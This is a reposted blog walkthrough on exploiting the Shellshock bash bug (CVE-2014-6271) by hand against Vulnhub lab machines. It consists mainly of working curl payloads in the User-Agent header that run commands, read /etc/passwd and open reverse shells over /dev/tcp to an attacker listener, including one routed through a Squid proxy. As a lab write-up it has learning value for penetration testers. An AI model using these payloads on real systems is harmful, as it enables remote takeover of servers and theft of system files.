Credits to SevenLayers
Exploitingย Shellshockย Manually
The scanner comes back with:ย โSite appears vulnerable to the โshellshockโ vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).โ
I realize Iโm talking about a four year old vulnerability but itโs one that still exists and itโs a rabbit hole I wanted to jump into.ย Iโve come across this vulnerability a few times in the past and Iโve either used Metasploit or 34900.py (โApache mod_cgi - โShellshockโ Remote Command Injectionโ) to get my shell.ย ย I seem to recall having an issue with one or both at some point and I moved on to another avenue because my search results yielded bits and pieces but nothing that I could wrap my hands around.
Stumbling upon this vulnerability recently, Iย paused to dig into it with the intention of getting a better understanding for manual exploitation.
The classic examples I see in from searches are the remote test:
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.90.59/cgi-bin/test.sh
And the local test:
x='() { :;}; echo VULNERABLE' bash -c :
If Iโm local, I donโt really care, I already have a shell.ย Itโs that remote angle I want to leverage.ย With a slight change of our syntax, we can read /etc/passwd:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://192.168.90.59/cgi-bin/test.sh
Nice!
Now letโs test for outbound connectivity on port 9999:
curl -H 'User-Agent: () { :; }; /bin/bash -c 'ping -c 3 192.168.90.35:9999'' http://192.168.90.59/cgi-bin/test.sh
On our side, we setup the listener:
Cool.ย We know we can connect outbound on port 9999, letโs go for the reverse shell:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.90.35/9999 0>&1' http://192.168.90.59/cgi-bin/test.sh
Setting up the listener:
Excellent โ we have a shell!ย
It wasnโt really that hard to get this working, I just needed to play with the syntax.ย In my searching, I saw examples of using wget or curl to pull in other files but I never understood why the need to add extra steps when you can get the shell directly.ย ย
So maybe youโre thinking whatโs the big deal?ย Why did I need to go through this exercise?ย ย
Sometimes I rely on tools and itโs a crutch.ย Sometimes I understand the mechanics and the tool is just easier / quicker.ย In this case, it was most definitely a crutch for a lack of knowledge and hereโs where this would have helped me out.ย
A while ago, I wrote upย Vulnhub SickOS 1.1 Walkthroughย and I actually noted the server was vulnerable to Shellshock.ย In the writeup, I walk through the process of exploiting the CMS which gets me a low privilege shell but now let me take you through the express lane.
We know we have a Squid proxy running on our target.ย Letโs use Curl to hit the CGI script through the proxy:
curl -x http://192.168.90.61:3128 -L http://127.0.0.1/cgi-bin/status
Cool, it works.ย Now letโs check to see if itโs vulnerable to Shellshock (we already know it is โ humor me!):
curl -x http://192.168.90.61:3128 -A "() { ignored; }; echo Content-Type: text/plain ; echoย ; echo ; /usr/bin/id" -L http://127.0.0.1/cgi-bin/status
Excellent!ย Now letโs get that shell:
curl -x http://192.168.90.61:3128 -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.90.35/9999 0>&1' -L http://127.0.0.1/cgi-bin/status```
Setting up the listener:
Shellz for everyone!